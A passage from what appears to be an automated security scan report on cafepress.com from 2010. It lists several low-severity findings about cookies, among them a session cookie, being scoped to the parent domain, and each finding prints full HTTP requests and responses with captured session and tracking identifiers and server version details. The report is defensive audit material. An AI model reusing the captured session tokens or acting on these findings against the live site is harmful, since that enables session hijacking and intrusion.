Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59426
Date: Sun, 26 Dec 2010 13:47:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.11. http://www.cafepress.com/+bumper-stickers
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+bumper-stickers
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+bumper-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 59721
Date: Sun, 26 Dec 2010 13:48:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/
Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.12. http://www.cafepress.com/+buttons
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+buttons
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59616 Date: Sun, 26 Dec 2010 13:48:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/ Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59616 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.13. http://www.cafepress.com/+calendars
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+calendars
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/
The highlighted cookie (ASP.NET_SessionId) appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+calendars HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 57707 Date: Sun, 26 Dec 2010 13:48:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/ Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57707 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.14. http://www.cafepress.com/+clocks
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+clocks
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/
The highlighted cookie (ASP.NET_SessionId) appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+clocks HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59318 Date: Sun, 26 Dec 2010 13:48:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/ Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59318 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.15. http://www.cafepress.com/+coasters
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+coasters
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/
The highlighted cookie (ASP.NET_SessionId) appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+coasters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59255 Date: Sun, 26 Dec 2010 13:48:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/ Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59255 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.16. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+eat_sleep_game_light_tshirt,299007536
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/
The highlighted cookie (ASP.NET_SessionId) appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; 